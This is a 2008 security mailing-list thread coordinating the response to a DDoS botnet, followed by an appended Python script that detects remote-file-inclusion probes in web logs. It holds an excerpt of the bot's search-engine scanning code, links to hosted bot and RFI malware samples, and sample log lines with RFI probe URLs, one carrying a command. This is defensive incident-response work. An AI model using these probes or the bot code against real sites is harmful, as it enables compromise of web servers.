[nsp-sec] DDoS against 213.27.239.85 (paging L3+NTT)

Stephen Gill gillsr at cymru.com
Thu Jan 31 17:13:04 EST 2008


BTW, Google, you might want to look at this address if you haven't already:

morgan.rx at gmail.com

They LOVE to use your search engine for scanning.

E.g.:

    # Excerpt from the bot's Google-scraping routine. The enclosing sub and the
    # http_query() helper it calls are not part of the excerpt.
    foreach $dom (@dominios)
    {
        # "@gstring" interpolates the @gstring array (space-joined) once per domain
        push (@str, "@gstring");
    }

    my $query = "www.google.com.ar/custom?q=";
    $query .= $str[(rand(scalar(@str)))];   # pick one search string at random
    $query .= "&num=$n&start=$s";           # result count and offset: pages through hits
    my @lst = ();
    #sendraw("privmsg #Morgan :DEBUG only test googling: ".$query."");
    my $page = http_query($query);
    # Harvest result links, dropping Google's own cache/translate links
    while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g) {
        if ($1 !~ m/google|cache|translate/) {
            push (@lst, $1);
        }
    }
    return (@lst);

-- steve


On 1/31/08 3:08 PM, "Stephen Gill" <gillsr at cymru.com> wrote:

> Hey Nico,
> 
>> Yes, the customer has the following ranges (and got hit on all 3):
>> 
>> 213.27.150.168/29
>> 213.27.239.80/28
>> 213.27.146.180/30
> 
> Now they are attacking other IPs, so you can rest easy for a little bit :D.
> 
> Is it okay to have the botnet taken down?
> 
>> Thanks. Can the people with bots on the list try to get a copy of the
>> malware ?
> 
> Sure :)
> 
> ->> this is basically your attacker
> http://www.vsm.gov.tr/pwnd/bot.txt
> 
> ->> these samples were seen spreading via RFI/XSS attacks also present on the
> same host:
> 
> http://www.vsm.gov.tr/pwnd/http.txt
> http://www.vsm.gov.tr/pwnd/safe.gif
> http://www.vsm.gov.tr/gorselbasin/docs/gorselbasin/aw128.txt
> 
>>> If you'd like we can set the wayback machine for before 27 JAN 2008
>>> and see if there are any other attacks or discourse.
>> 
>> We only saw attacks this week so far, nothing in PFSP for the weeks
>> before.
> 
> Here is a list of current/actual attacking IPs connected to the botnet:
> 
> 701     | 74.85.126.2      | UUNET - MCI Communications Services, Inc. d/b/a Verizon Business
> 2819    | 212.65.242.233   | GTSCZ GTS NOVERA (GTS CZ)
> 2914    | 128.121.21.48    | NTT-COMMUNICATIONS-2914 - NTT America, Inc.
> 2914    | 198.64.129.165   | NTT-COMMUNICATIONS-2914 - NTT America, Inc.
> 3221    | 193.40.0.77      | EENet Autonomous System
> 3313    | 213.92.95.80     | INET-AS I.NET S.p.A.
> 3320    | 84.177.65.151    | DTAG Deutsche Telekom AG
> 3356    | 62.67.235.50     | LEVEL3 Level 3 Communications
> 3462    | 125.229.160.217  | HINET Data Communication Business Group
> 3561    | 72.232.12.234    | SAVVIS - Savvis
> 3561    | 72.36.152.194    | SAVVIS - Savvis
> 3561    | 72.36.225.130    | SAVVIS - Savvis
> 4266    | 12.130.64.131    | CERNET-ASN-BLOCK - California Education and Research Federation Network
> 4618    | 203.151.217.29   | INET-TH-AS Internet Thailand Company Limited
> 4713    | 219.163.200.103  | OCN NTT Communications Corporation
> 4713    | 219.163.200.92   | OCN NTT Communications Corporation
> 4713    | 219.163.200.94   | OCN NTT Communications Corporation
> 4713    | 219.163.5.182    | OCN NTT Communications Corporation
> 4713    | 219.163.5.188    | OCN NTT Communications Corporation
> 4713    | 221.186.251.79   | OCN NTT Communications Corporation
> 4713    | 221.186.251.87   | OCN NTT Communications Corporation
> 4713    | 60.32.201.102    | OCN NTT Communications Corporation
> 4741    | 210.246.192.133  | SAMART-BOARDER-AS Samart Corporation Co., Ltd.
> 4750    | 203.146.127.150  | CSLOXINFO-ISP-AS-AP CSLOXINFO Public Company Limited.
> 4750    | 203.146.140.172  | CSLOXINFO-ISP-AS-AP CSLOXINFO Public Company Limited.
> 4765    | 221.128.124.188  | WORLDNET-AS World Net & Services Co., Ltd.
> 4765    | 61.47.2.218      | WORLDNET-AS World Net & Services Co., Ltd.
> 6453    | 80.231.130.106   | GLOBEINTERNET Teleglobe America Inc.
> 7303    | 190.225.141.138  | Telecom Argentina S.A.
> 7303    | 200.43.222.198   | Telecom Argentina S.A.
> 7654    | 202.57.163.225   | SIAMGLOBE-AS-AP Internet Service Provider Co., Ltd.
> 7693    | 203.155.19.67    | COMNET-TH KSC Commercial Internet Co. Ltd.
> 7738    | 189.24.125.110   | Telecomunicacoes da Bahia S.A.
> 7738    | 201.79.97.98     | Telecomunicacoes da Bahia S.A.
> 8167    | 200.203.183.62   | TELESC - Telecomunicacoes de Santa Catarina SA
> 8167    | 200.96.181.60    | TELESC - Telecomunicacoes de Santa Catarina SA
> 8342    | 81.176.226.50    | RTCOMM-AS RTComm.RU Autonomous System
> 8560    | 217.160.252.231  | ONEANDONE-AS 1&1 Internet AG
> 8560    | 87.106.68.155    | ONEANDONE-AS 1&1 Internet AG
> 8584    | 212.150.164.23   | BARAK Netvision 013 Barak - Barak Network
> 8708    | 82.76.253.82     | RDSNET RCS & RDS S.A.
> 9024    | 212.40.64.89     | DRAVANET-AS Dravanet Co Ltd.
> 9120    | 212.97.132.103   | COHAESIONET Cohaesio A/S
> 9120    | 212.97.132.118   | COHAESIONET Cohaesio A/S
> 9120    | 212.97.132.130   | COHAESIONET Cohaesio A/S
> 9120    | 212.97.134.11    | COHAESIONET Cohaesio A/S
> 9600    | 218.216.67.40    | SONYTELECOM SONY CORPORATION
> 9931    | 61.7.225.34      | CAT-AP The Communication Authoity of Thailand, CAT
> 10481   | 200.32.8.16      | Prima S.A.
> 11351   | 69.207.1.21      | RR-NYSREGION-ASN-01 - Road Runner HoldCo LLC
> 12129   | 66.51.147.10     | 123NET - Internet 123
> 12594   | 212.40.96.82     | EXTERNET-AS EXTERNET Autonomus System
> 12876   | 195.154.77.64    | AS12876 Telecom Italia France
> 14992   | 209.200.117.138  | CRYSTALTECH - CrystalTech Web Hosting Inc.
> 15857   | 84.40.155.152    | DIALOG-AS DIALOG-NET Autonomuos System
> 16301   | 213.148.182.69   | DATACOM-AS Novgorod Datacom Autonomous System
> 16814   | 200.68.98.226    | NSS S.A.
> 17676   | 219.101.229.138  | GIGAINFRA BB TECHNOLOGY Corp.
> 18403   | 210.245.120.6    | FPT-AS-AP The Corporation for Financing & Promoting Technology
> 18479   | 189.14.101.1     | Plug-In Vanet Sistemas de Comunicao LTDA
> 18479   | 189.14.101.4     | Plug-In Vanet Sistemas de Comunicao LTDA
> 20312   | 150.187.103.20   | CNTI-REACCIUN
> 20312   | 150.187.25.5     | CNTI-REACCIUN
> 21470   | 81.17.72.133     | SWISP-AS Data Centre and ISP SWT Networks Limited Communications House Moor
> 23974   | 202.143.176.197  | MOE-EDNET-AS-AP Ministry of education
> 23974   | 203.172.180.250  | MOE-EDNET-AS-AP Ministry of education
> 24806   | 81.2.194.152     | INTERNET-CZ INTERNET CZ, a.s.,
> 25137   | 81.92.211.4      | NFSI NFSi Telecom, Lda.
> 25653   | 69.72.161.50     | FORTRESSITX - FortressITX
> 28590   | 201.54.26.98     | Neovia Telecomunicacoes S.A.
> 29208   | 82.119.225.27    | DIALTELECOM-AS Dial Telecom A.S., Bratislava
> 29300   | 82.148.187.66    | DIRECTCONNECT-AS Direct Connect, ISP, Norway
> 33660   | 75.145.57.237    | DNEO-OSP7 - Comcast Cable Communications, Inc.
> 39134   | 88.212.201.3     | SKYMEDIA Sky-Media Ltd. AS number
> 41003   | 194.153.116.180  | IP-INTERACTIVE IP-Interactive Colocation / IP Transit Provider
> 41126   | 89.111.180.245   | CENTROHOST-AS JSC Centrohost
> 
> Cheers,
> Steve, Team Cymru.

-- 
Stephen Gill, Chief Scientist, Team Cymru
http://www.cymru.com | +1 312 924 4023 | gillsr at cymru.com
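Added example, not part of the original post and not taken from the bot: the thread notes that the samples spread via RFI attacks, i.e. the bot finds candidate sites through search-engine queries and then requests a vulnerable include parameter with a URL pointing at its hosted payload. The defender-side counterpart is to spot those probes in one's own web logs. The script below parses Apache combined-format lines, decodes each query parameter, and flags values that are remote URLs ending in a payload-style extension or carrying the "?" terminator that RFI probes use to neutralise whatever the vulnerable script appends. The log lines, RFC 5737 addresses, .invalid hostnames and the extension list are all constructed assumptions for illustration; the payload filenames only echo the style seen in the thread.

```python
"""Flag remote-file-inclusion (RFI) probes in Apache combined-format logs.

Editor-added example; not code from the original post or from the bot.
Log lines, addresses and hostnames below are constructed for illustration.
"""
import posixpath
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed sample: two RFI probes with .txt/.gif payloads, one probe using
# only the "?" terminator, one normal page view and one legitimate URL-valued
# parameter that must not be flagged.
SAMPLE_LOG = """\
203.0.113.7 - - [31/Jan/2008:14:02:11 -0500] "GET /index.php?page=http://payload.example.invalid/pwnd/bot.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.23 - - [31/Jan/2008:14:02:13 -0500] "GET /modules/view.php?inc=http%3A%2F%2Fpayload.example.invalid%2Fsafe.gif%3F%26cmd%3Did HTTP/1.0" 404 210 "-" "libwww-perl/5.805"
192.0.2.9 - - [31/Jan/2008:14:03:00 -0500] "GET /index.php?page=about HTTP/1.1" 200 4096 "http://www.example.invalid/" "Mozilla/5.0"
192.0.2.9 - - [31/Jan/2008:14:03:05 -0500] "GET /search?q=http://www.example.invalid/page HTTP/1.1" 200 100 "-" "Mozilla/5.0"
203.0.113.7 - - [31/Jan/2008:14:05:40 -0500] "GET /admin/index.php?path=http://203.0.113.40/r57? HTTP/1.1" 200 77 "-" "libwww-perl/5.805"
"""

# Apache "combined" format: ip ident user [time] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Assumed list of file types under which RFI payloads are commonly hosted so
# that the hosting server serves them as plain files rather than executing them.
PAYLOAD_EXTS = {".txt", ".gif", ".jpg", ".jpeg", ".png", ".php", ".dat"}


def classify_value(value):
    """Return a reason if a decoded parameter value looks like a remote include, else None."""
    u = urlsplit(value)
    if u.scheme not in ("http", "https", "ftp") or not u.netloc:
        return None
    ext = posixpath.splitext(u.path)[1].lower()
    if ext in PAYLOAD_EXTS:
        return f"remote URL with payload-style extension {ext}"
    if "?" in value:
        # A "?" after the remote path turns whatever the vulnerable script
        # appends to the include (e.g. ".php") into a query string for the
        # attacker's host, so the include still resolves to the payload.
        return "remote URL with '?' terminator"
    return None


def scan_line(line):
    """Parse one log line and return a list of findings (possibly empty)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    query = urlsplit(m["target"]).query
    hits = []
    # parse_qsl splits on "&" before percent-decoding, so an encoded "%26cmd=id"
    # stays inside the value where it belongs.
    for param, value in parse_qsl(query, keep_blank_values=True):
        reason = classify_value(value)
        if reason:
            hits.append({
                "ip": m["ip"], "ts": m["ts"], "param": param, "url": value,
                "host": urlsplit(value).netloc, "ua": m["ua"], "reason": reason,
            })
    return hits


def scan_log(text):
    """Run scan_line over every line of a log and collect the findings."""
    findings = []
    for line in text.splitlines():
        findings.extend(scan_line(line))
    return findings


def payload_hosts(findings):
    """Count findings per payload host: the hosts worth reporting for takedown."""
    return Counter(f["host"] for f in findings)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f'{f["ts"]} {f["ip"]} param={f["param"]} -> {f["url"]} ({f["reason"]})')
    print("payload hosts:", dict(payload_hosts(found)))
```

To use it on real data, replace SAMPLE_LOG with the contents of an access log in combined format; the per-host counter is the list of payload-hosting servers to pull samples from and report, which is what the thread asks for. The heuristic deliberately ignores plain URL-valued parameters such as redirect targets, so expect it to miss a probe whose payload URL has neither a listed extension nor a "?" terminator.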
